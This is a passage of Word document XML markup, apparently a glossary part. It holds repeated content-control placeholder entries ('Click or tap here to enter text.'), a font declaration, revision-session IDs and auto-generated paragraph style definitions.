          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="440CFC509D3C4F7396E5BCE394BFF6B3"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{6B7115F4-742D-4B97-BC1F-1A36AC00984E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="440CFC509D3C4F7396E5BCE394BFF6B3"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E7073F58C37142BE903F1A32B9C3729D"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C169F5F3-6377-4883-8246-42ADAB711D96}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D06894" w:rsidRDefault="00DD4250" w:rsidP="00DD4250">
          <w:pPr>
            <w:pStyle w:val="E7073F58C37142BE903F1A32B9C3729D"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E3291508DE1B41CAB244A3ED086BA406"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{23AA82DA-693B-4F9D-A7EF-204A18C1242B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007F39F8" w:rsidRDefault="004D5B1E" w:rsidP="004D5B1E">
          <w:pPr>
            <w:pStyle w:val="E3291508DE1B41CAB244A3ED086BA406"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A9B58977D1134150A614816097915041"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{11E94721-FC1F-4940-9BE4-96E2593F43D9}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007F39F8" w:rsidRDefault="004D5B1E" w:rsidP="004D5B1E">
          <w:pPr>
            <w:pStyle w:val="A9B58977D1134150A614816097915041"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{A11E9E98-D72B-440C-94E2-D062B1AF7250}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00DB6DF7" w:rsidRDefault="00C777FA" w:rsidP="00C777FA">
          <w:pPr>
            <w:pStyle w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="EE9E71820EAE45E28E54A8F305D9DFB2"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{5DC4C55D-9E6E-4E90-9424-53217397928B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="EE9E71820EAE45E28E54A8F305D9DFB2"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="EB1C2BD315FF4885B8C649B85ED2D99C"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{ACAFC589-1B4F-4EF0-A214-8B22D4A7BD69}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="EB1C2BD315FF4885B8C649B85ED2D99C"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="97CD04066F284B47A90DDEC2A1214392"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{4F6F329D-9E66-4F5C-BA9B-FCAE0A94A9BF}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="97CD04066F284B47A90DDEC2A1214392"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="BB82B5154FB9478D82ADD82242CB557A"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{67D96A3E-F05D-46E5-8B3D-F446586EF67F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="BB82B5154FB9478D82ADD82242CB557A"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="C7CCC0CA0C634A548B7119F24AE0A316"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{ADB05AF9-4C85-4E1F-A012-44A7BD7B6367}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="C7CCC0CA0C634A548B7119F24AE0A316"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="44017D732F274E7198B74F889CE9F3D2"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{7534E28D-5A4D-4CAA-9F84-27852445353E}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="44017D732F274E7198B74F889CE9F3D2"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="F38738C3CECF47C1A859750AFEEDCBB3"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{30580274-E4FF-483A-8176-F7F3F5C04D5C}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00323316" w:rsidRDefault="00E745C3" w:rsidP="00E745C3">
          <w:pPr>
            <w:pStyle w:val="F38738C3CECF47C1A859750AFEEDCBB3"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="44C8873D8E2A43F6B16FAAC6FC588515"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{6A802126-9EEA-440B-BF72-87F1B74DABBD}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="009277D4" w:rsidRDefault="0079661A" w:rsidP="0079661A">
          <w:pPr>
            <w:pStyle w:val="44C8873D8E2A43F6B16FAAC6FC588515"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A159E37B19E84BE9948676D77F6C508A"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{CF988133-E66C-4131-92FA-31E1D601064F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00755ED5" w:rsidRDefault="00F50B34" w:rsidP="00F50B34">
          <w:pPr>
            <w:pStyle w:val="A159E37B19E84BE9948676D77F6C508A"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="E1A9EBE287E4470DA73B937AA658F493"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{DFDC34A7-3C86-4646-B18C-FC34B180EF9C}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00755ED5" w:rsidRDefault="00F50B34" w:rsidP="00F50B34">
          <w:pPr>
            <w:pStyle w:val="E1A9EBE287E4470DA73B937AA658F493"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C41">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Click or tap here to enter text.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3D08CA0525554A9C8A227A9EFD2EBC46"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{6F12EE06-7D95-4844-A935-EDD3281256B0}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00755ED5" w:rsidRDefault="00F50B34" w:rsidP="00F50B34">
          <w:pPr>
            <w:pStyle w:val="3D08CA0525554A9C8A227A9EFD2EBC46"/>
          </w:pPr>
          <w:r w:rsidRPr="00462C4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Open Sans">
    <w:altName w:val="Open Sans"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002EF" w:usb1="4000205B" w:usb2="00000028"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55A"/>
    <w:rsid w:val="00087987"/>
    <w:rsid w:val="00112A26"/>
    <w:rsid w:val="001221EF"/>
    <w:rsid w:val="00152502"/>
    <w:rsid w:val="0015569B"/>
    <w:rsid w:val="0016193B"/>
    <w:rsid w:val="00236BDB"/>
    <w:rsid w:val="00251B46"/>
    <w:rsid w:val="00323316"/>
    <w:rsid w:val="00352D0E"/>
    <w:rsid w:val="00370B93"/>
    <w:rsid w:val="00384C50"/>
    <w:rsid w:val="003B4C7F"/>
    <w:rsid w:val="003C58A8"/>
    <w:rsid w:val="003D1833"/>
    <w:rsid w:val="00442615"/>
    <w:rsid w:val="00477960"/>
    <w:rsid w:val="0049355A"/>
    <w:rsid w:val="004A350A"/>
    <w:rsid w:val="004A5228"/>
    <w:rsid w:val="004D5B1E"/>
    <w:rsid w:val="004E11D1"/>
    <w:rsid w:val="00567ABE"/>
    <w:rsid w:val="005844A6"/>
    <w:rsid w:val="005E1BF4"/>
    <w:rsid w:val="00605678"/>
    <w:rsid w:val="006B1928"/>
    <w:rsid w:val="00731C96"/>
    <w:rsid w:val="00755ED5"/>
    <w:rsid w:val="007729BC"/>
    <w:rsid w:val="0079661A"/>
    <w:rsid w:val="007C68C8"/>
    <w:rsid w:val="007F39F8"/>
    <w:rsid w:val="00840FFC"/>
    <w:rsid w:val="008B4470"/>
    <w:rsid w:val="008C0430"/>
    <w:rsid w:val="008F5ABF"/>
    <w:rsid w:val="009277D4"/>
    <w:rsid w:val="0095628F"/>
    <w:rsid w:val="00A31CA7"/>
    <w:rsid w:val="00B1334F"/>
    <w:rsid w:val="00BF5CD9"/>
    <w:rsid w:val="00BF7766"/>
    <w:rsid w:val="00C04E1E"/>
    <w:rsid w:val="00C777FA"/>
    <w:rsid w:val="00D06894"/>
    <w:rsid w:val="00D24D21"/>
    <w:rsid w:val="00D56A2A"/>
    <w:rsid w:val="00D64605"/>
    <w:rsid w:val="00D65153"/>
    <w:rsid w:val="00DA4BB0"/>
    <w:rsid w:val="00DB6DF7"/>
    <w:rsid w:val="00DD4250"/>
    <w:rsid w:val="00E745C3"/>
    <w:rsid w:val="00ED6268"/>
    <w:rsid w:val="00EE4090"/>
    <w:rsid w:val="00F50B34"/>
    <w:rsid w:val="00FE14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50B34"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1ED925AF5C9F4EDAA1301A66ACA4B8EB">
    <w:name w:val="1ED925AF5C9F4EDAA1301A66ACA4B8EB"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B4968CCAFF454D81A20E29BBF44F45F0">
    <w:name w:val="B4968CCAFF454D81A20E29BBF44F45F0"/>
    <w:rsid w:val="00D64605"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72A9045DA3DF43B29FB200131625196B">
    <w:name w:val="72A9045DA3DF43B29FB200131625196B"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13AF5044F8CA46BE887C695480ED10BC">
    <w:name w:val="13AF5044F8CA46BE887C695480ED10BC"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="076EDDCD79DE44DC93936E0E0EBCA221">
    <w:name w:val="076EDDCD79DE44DC93936E0E0EBCA221"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A0997C5AEE394EB78893892DCA3BF135">
    <w:name w:val="A0997C5AEE394EB78893892DCA3BF135"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FEA8D09E1C4743D19BEC2A3CB6996E41">
    <w:name w:val="FEA8D09E1C4743D19BEC2A3CB6996E41"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3E6AB743BD494E82A65780FF864B8B24">
    <w:name w:val="3E6AB743BD494E82A65780FF864B8B24"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A20C4381D955412C8FEA095412BE9874">
    <w:name w:val="A20C4381D955412C8FEA095412BE9874"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B02B0417302F46CF840AA81FCE2E1164">
    <w:name w:val="B02B0417302F46CF840AA81FCE2E1164"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D2A63D841D5A4D2EB247EF9EB874CDC3">
    <w:name w:val="D2A63D841D5A4D2EB247EF9EB874CDC3"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="48F06C37D8854FEB813217324E35AF3E">
    <w:name w:val="48F06C37D8854FEB813217324E35AF3E"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DD64B62FC8A3449DBC54D5F97F94B8F7">
    <w:name w:val="DD64B62FC8A3449DBC54D5F97F94B8F7"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7062C0D66EAB4637A9228847C47DC609">
    <w:name w:val="7062C0D66EAB4637A9228847C47DC609"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AB865B082A684B71B56E518D83400D43">
    <w:name w:val="AB865B082A684B71B56E518D83400D43"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BF89F913C6E64BD2BCE84E30B2F33962">
    <w:name w:val="BF89F913C6E64BD2BCE84E30B2F33962"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3E30850FF7494E1BA617BD213F21BEA3">
    <w:name w:val="3E30850FF7494E1BA617BD213F21BEA3"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B1606384D4D54B2E9BA3699B5781FEE6">
    <w:name w:val="B1606384D4D54B2E9BA3699B5781FEE6"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6EE7B9725F55459BB751C023024BB54F">
    <w:name w:val="6EE7B9725F55459BB751C023024BB54F"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35708180EB364F1AB30F61C866E192B5">
    <w:name w:val="35708180EB364F1AB30F61C866E192B5"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5E8209F0A4E64F608BE4C52D1B5B2B09">
    <w:name w:val="5E8209F0A4E64F608BE4C52D1B5B2B09"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2D43A7A42F0F46D38176B46BFDEC3D2D">
    <w:name w:val="2D43A7A42F0F46D38176B46BFDEC3D2D"/>
    <w:rsid w:val="007729BC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38BB14F76EB644EABEDDE5CA215E676A">
    <w:name w:val="38BB14F76EB644EABEDDE5CA215E676A"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74F0758DDAFD4E3C88E9D9600A65680A">
    <w:name w:val="74F0758DDAFD4E3C88E9D9600A65680A"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5CEE3EB748284E55992025BAACA04193">
    <w:name w:val="5CEE3EB748284E55992025BAACA04193"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3380AB1E226A424DBE9F42DA045327AA">
    <w:name w:val="3380AB1E226A424DBE9F42DA045327AA"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="686BF089BED3442EABBADBA36EF2E909">
    <w:name w:val="686BF089BED3442EABBADBA36EF2E909"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EB9CCA32BA4249328C702FE54D344D68">
    <w:name w:val="EB9CCA32BA4249328C702FE54D344D68"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82DD7323F7EA4915A4766D830C41E241">
    <w:name w:val="82DD7323F7EA4915A4766D830C41E241"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="86C928A70B2941EDA3AB438405B65E10">
    <w:name w:val="86C928A70B2941EDA3AB438405B65E10"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3B56EF27566D4DF98A267FCD71310D6E">
    <w:name w:val="3B56EF27566D4DF98A267FCD71310D6E"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1511413C552041E4AFC1546F8299E560">
    <w:name w:val="1511413C552041E4AFC1546F8299E560"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A6A01364A42641DC9865DC5FAC166B88">
    <w:name w:val="A6A01364A42641DC9865DC5FAC166B88"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="267845E1777A40589686BB6B3CD81B20">
    <w:name w:val="267845E1777A40589686BB6B3CD81B20"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5F54E9EB21B8419C91ADE62F933935BF">
    <w:name w:val="5F54E9EB21B8419C91ADE62F933935BF"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B3C388D15E8B4130AC3BEDAFBB4E3FAF">
    <w:name w:val="B3C388D15E8B4130AC3BEDAFBB4E3FAF"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ED0956A66DF2475F9F7BE07D20875025">
    <w:name w:val="ED0956A66DF2475F9F7BE07D20875025"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="943E3ECB367F4FD9BD5573880350755E">
    <w:name w:val="943E3ECB367F4FD9BD5573880350755E"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0702D56F4B0544549991F434DB10CA9B">
    <w:name w:val="0702D56F4B0544549991F434DB10CA9B"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9ABAFE174CAE4A9EA8CBDC38A9656ED0">
    <w:name w:val="9ABAFE174CAE4A9EA8CBDC38A9656ED0"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7397539074E84AFBB931612F0F5475BA">
    <w:name w:val="7397539074E84AFBB931612F0F5475BA"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="87C3013135E148688EF88088F98624CE">
    <w:name w:val="87C3013135E148688EF88088F98624CE"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DC835E879B9F4859AB833F53C7A05C0C">
    <w:name w:val="DC835E879B9F4859AB833F53C7A05C0C"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="29F6BD7097A146A0A8DD8AFBD250346D">
    <w:name w:val="29F6BD7097A146A0A8DD8AFBD250346D"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="984429ACD67B49A2A8DAF721F44D2A10">
    <w:name w:val="984429ACD67B49A2A8DAF721F44D2A10"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="01109C8489BC41E4A1675961AAF9358E">
    <w:name w:val="01109C8489BC41E4A1675961AAF9358E"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D52EBDF8CE594C3B94ACD118B53923E2">
    <w:name w:val="D52EBDF8CE594C3B94ACD118B53923E2"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D10E686430A949C7959AF889B704E437">
    <w:name w:val="D10E686430A949C7959AF889B704E437"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0A61E21E7CD1410CBD1B21B72B0CE228">
    <w:name w:val="0A61E21E7CD1410CBD1B21B72B0CE228"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C83EA514D44441A5A7DD2B40685501E8">
    <w:name w:val="C83EA514D44441A5A7DD2B40685501E8"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="50B08E4EF1DA4D46855CF7FA2AB53DEC">
    <w:name w:val="50B08E4EF1DA4D46855CF7FA2AB53DEC"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E4F36745AA624AF1B0E8AAE8098079C1">
    <w:name w:val="E4F36745AA624AF1B0E8AAE8098079C1"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E72DEEFACCD04F38BC6593CC22719A48">
    <w:name w:val="E72DEEFACCD04F38BC6593CC22719A48"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="557368C1287E4D17BE989CE96B47CFB4">
    <w:name w:val="557368C1287E4D17BE989CE96B47CFB4"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3EFBBE7E0F354F4B83CAAA47A1DE07B4">
    <w:name w:val="3EFBBE7E0F354F4B83CAAA47A1DE07B4"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="376174F0CE34467184B8C93A085DA6C2">
